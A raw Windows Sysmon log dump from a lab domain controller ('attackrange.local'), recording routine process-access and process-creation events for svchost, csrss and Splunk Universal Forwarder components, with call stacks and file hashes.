13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.145{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.957{59A5CD1D-92B0-6005-C004-00000000A301}45203152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.817{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.285{59A5CD1D-92B0-6005-BF04-00000000A301}25163688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 